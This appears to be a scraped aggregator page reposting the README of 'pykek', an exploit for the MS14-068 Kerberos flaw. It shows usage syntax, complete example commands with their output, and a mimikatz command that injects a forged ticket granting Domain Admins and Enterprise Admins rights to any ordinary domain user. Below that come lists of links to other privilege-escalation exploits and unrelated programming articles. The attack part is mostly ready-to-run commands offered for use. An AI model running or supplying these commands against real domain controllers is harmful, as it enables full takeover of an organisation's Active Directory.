https://github.com/bidord/pykek

ms14-068.py

Exploits MS14-680 vulnerability on an un-patched domain controler of
an Active Directory domain to get a Kerberos ticket for an existing
domain user account with the privileges of the following domain groups :

Domain Users (513)

Domain Admins (512)

Schema Admins (518)

Enterprise Admins (519)

Group Policy Creator Owners (520)

USAGE:

ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr>

OPTIONS:

    -p <clearPassword>

--rc4 <ntlmHash>

Example usage :

Linux (tested with samba and MIT Kerberos)

root@kali:~/sploit/pykek# python ms14-068.py -u user-a-1@dom-a.loc
-s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc

Password:

  [+] Building AS-REQ for dc-a-2003.dom-a.loc... Done!

  [+] Sending AS-REQ to dc-a-2003.dom-a.loc... Done!

  [+] Receiving AS-REP from dc-a-2003.dom-a.loc... Done!

  [+] Parsing AS-REP from dc-a-2003.dom-a.loc... Done!

  [+] Building TGS-REQ for dc-a-2003.dom-a.loc... Done!

  [+] Sending TGS-REQ to dc-a-2003.dom-a.loc... Done!

  [+] Receiving TGS-REP from dc-a-2003.dom-a.loc... Done!

  [+] Parsing TGS-REP from dc-a-2003.dom-a.loc... Done!

  [+] Creating ccache file 'TGT_user-a-1@dom-a.loc.ccache'... Done!

root@kali:~/sploit/pykek# mv TGT_user-a-1@dom-a.loc.ccache /tmp/krb5cc_0

On Windows

python.exe ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc

mimikatz.exe "kerberos::ptc TGT_user-a-1@dom-a.loc.ccache" exit`

http://zone.wooyun.org/content/17102

MS14-068 privilege escalation PoC: 可以让任何域内用户提升为域管理员的更多相关文章

  1. CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC

    /**  * CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC  *  * Vitaly Nikolenko  * http://ha ...

  2. [EXP]Memu Play 6.0.7 - Privilege Escalation

    # Exploit Title: Memu Play - Privilege Escalation (PoC) # Date: // # Author: Alejandra Sánchez # Ven ...

  3. karottc A Simple linux-virus Analysis、Linux Kernel <= 2.6.37 - Local Privilege Escalation、CVE-2010-4258、CVE-2010-3849、CVE-2010-3850

    catalog . 程序功能概述 . 感染文件 . 前置知识 . 获取ROOT权限: Linux Kernel <= - Local Privilege Escalation 1. 程序功能概述 ...

  4. Linux/Unix System Level Attack、Privilege Escalation(undone)

    目录 . How To Start A System Level Attack . Remote Access Attack . Local Access Attack . After Get Roo ...

  5. [EXP]Microsoft Windows - DfMarshal Unsafe Unmarshaling Privilege Escalation

    Windows: DfMarshal Unsafe Unmarshaling Elevation of Privilege (Master) Platform: Windows (not tested ...

  6. FreeBSD Intel SYSRET Kernel Privilege Escalation Exploit

    /* * FreeBSD 9.0 Intel SYSRET Kernel Privilege Escalation exploit * Author by CurcolHekerLink * * Th ...

  7. Basic Linux Privilege Escalation

    (Linux) privilege escalation is all about: Collect - Enumeration, more enumeration and some more enu ...

  8. Android linux kernel privilege escalation vulnerability and exploit (CVE-2014-4322)

    In this blog post we'll go over a Linux kernel privilege escalation vulnerability I discovered which ...

  9. OSCP Learning Notes - Privilege Escalation

    Privilege Escalation Download the Basic-pentesting vitualmation from the following website: https:// ...

随机推荐

  1. eclipse的c++工程开启c++11

    右击工程->Properties->C/C++ Builder->Setting->Tool Setting->Miscellanous->Other Flags添 ...

  2. iOS 中的字体预览

    要预览iOS的各种字体的效果,可以访问http://iosfonts.com

  3. 【python】zip()函数

    来源:http://www.cnblogs.com/frydsh/archive/2012/07/10/2585370.html zip函数接受任意多个(包括0个和1个)序列作为参数,返回一个tupl ...

  4. Android自定义progressBar

    通过继承系统ProgressBar实现 效果图 实现 HorizontalProgressBarWithNumber 自定义属性 <?xml version="1.0" en ...

  5. cocos2dx创建sprite的多种方法

    方法一 最常用,也是最简单的一种方法 CCSprite *bg=CCSprite::create(,,,)); bg->setAnchorPoint(ccp(,)); bg->setPos ...

  6. Myeclipse中把java代码导成UML类图

    Myeclipse中把java代码导成UML类图 1.右键点击项目名称,选择New-------àUML2 Model 2.给类图命名 3.导成类图 1)如果要把整个项目导成类图,则把整个项目拖到类图 ...

  7. Xamarin.Android开发实践(八)

    Xamarin.Android其他类型的服务 一.前言 前面我们已经学了关于服务的很多知识,但是对于真实的开发那些远远不够,通过这节我们将学习其他类型的服务,比如前台服务.IntentService和 ...

  8. 如何在 Laravel 中使用 SMTP 发送邮件(适用于 163、QQ、Gmail 等)

    Laravel  和 Laravel  的邮件发送使用方式完全一致.Laravel  的邮件发送中文文档在:http: 邮箱为例,展示如何用 Laravel 内置的邮件发送类来发送邮件. 配置 修改邮 ...

  9. android JNI调用(转)

    Android jni开发资料--NDK环境搭建 android开发人员注意了 谷歌改良了ndk的开发流程,对于Windows环境下NDK的开发,如果使用的NDK是r7之前的版本,必须要安装Cygwi ...

  10. 网站构建学习笔记(0)——基本概念了解及资源学习(copy自w3school)

    一.学习方面 1.WWW - 万维网 什么是 WWW? WWW 指万维网(World Wide Web) 万维网常被称为Web Web 是由遍布全球的计算机所组成的网络 所有 Web 中的计算机都可以 ...